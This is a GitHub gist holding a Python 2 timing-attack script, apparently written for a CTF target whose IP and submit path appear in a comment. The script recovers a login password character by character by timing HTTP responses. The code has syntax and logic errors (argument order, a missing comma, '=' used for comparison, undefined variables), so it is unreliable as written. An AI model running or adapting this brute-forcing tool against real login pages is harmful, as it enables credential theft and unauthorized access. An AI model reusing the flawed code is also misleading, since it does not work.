Created
April 19, 2013 15:08
-
-
Save luca-m/5420972 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Timing Attack Miscellaneous | |
| # | |
| import string | |
| import sys | |
| import re | |
| import time | |
| import threading | |
| import httplib | |
| class Methods: | |
| Get='GET' | |
| Post='POST' | |
| class TimingAttack(threading.Thread): | |
| ''' ''' | |
| def __init__(self,method=Methods.Get,targethost, path, | |
| pwdlen=8,nsample=10,donestr='logged in' | |
| alphabet=string.lowercase+string.digits+'_-!?=)(/&%$"!'): | |
| self.lenpad=pwdlen | |
| self.pad='X'*lenpad | |
| self.found=False | |
| self.targethost=targethost | |
| self.method=method | |
| self.path=path | |
| self.data=dict() | |
| self.nsample=nsample | |
| self.currentSample=-1 | |
| self.currenttryindex=-1 | |
| self.alphabet=alphabet | |
| self.donestr=donestr | |
| self.currentpwd='' | |
| self.currenttry='' | |
| def getCurrTry(self): | |
| ''' Obtain the current character ''' | |
| self.currentSample = (self.currentSample+1)%self.nsample | |
| if self.currentSample == 0 : | |
| self.currenttryindex = (self.currenttryindex+1)%len(self.alphabet) | |
| print "Trying: "+self.currentpwd+self.alphabet[self.currenttryindex] | |
| self.currenttry=self.alphabet[self.currenttryindex] | |
| return self.currenttry | |
| def prepareGuess(self): | |
| ''' Prepare the next guess ''' | |
| s= self.currentpwd + self.currenttry | |
| s+= '_'*(self.lenpad-len(s)) | |
| return s | |
| def alphabetOver(self): | |
| ''' ''' | |
| if self.currenttryindex == len(self.alphabet)-1: | |
| # Decide the next char of the pwd. | |
| # First calculate samples avg (not so statistically revelant) | |
| for ctry in self.data.keys(): | |
| samples = self.data[ctry] | |
| tmp=sum(samples) / len(samples) | |
| samples.append(tmp) | |
| self.data[ctry]=tmp | |
| # Then pick the maximum avg (ugly) | |
| self.currentpwd = max(self.data, key = lambda w:self.data[w]) | |
| self.data = dict(list()) | |
| def createConnection(self): | |
| conn = httplib.HTTPConnection(self.targethost) | |
| return conn | |
| def doRequest(self,conn,passwd='' ): | |
| conn.request(self.method, self.path%passwd) | |
| return conn.getresponse() | |
| def run(self): | |
| while ( not self.found ): | |
| self.getCurrTry() | |
| guess = self.prepareGuess() | |
| #print "Trying: "+guess | |
| conn = self.createConnection() | |
| time1 = time.time() | |
| res = self.doRequest(conn,guess) | |
| time2 = time.time() | |
| elapsed = time2-time1 | |
| if self.donestr in res.read(): | |
| self.found = True | |
| print res.read() | |
| continue | |
| key = self.currentpwd+self.currenttry | |
| if key not in self.data: | |
| self.data[key] = list() | |
| self.data[key].append(elapsed) | |
| self.alphabetOver() | |
| if __name__ = "__main__": | |
| # "128.238.66.216""/eccbc87e4b5ce2fe28308fd9f2a7baf3/submit.php?pass=" | |
| nsample= int( sys.argv[1] ) | |
| targethost = sys.argv[2] | |
| tpath = sys.argv[3] | |
| print "Starting Timing Attack.. (note remenmber to use %s to mark guess position)" | |
| print "Target: GET %s %s " % (targethost,tpath) | |
| print "%d samples per guess"(nsample) | |
| ta = TimingAttack(targethost=targethost,path=tpath, | |
| pwdlen=8,nsample=10) | |
| ta.start() | |
| ta.join() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment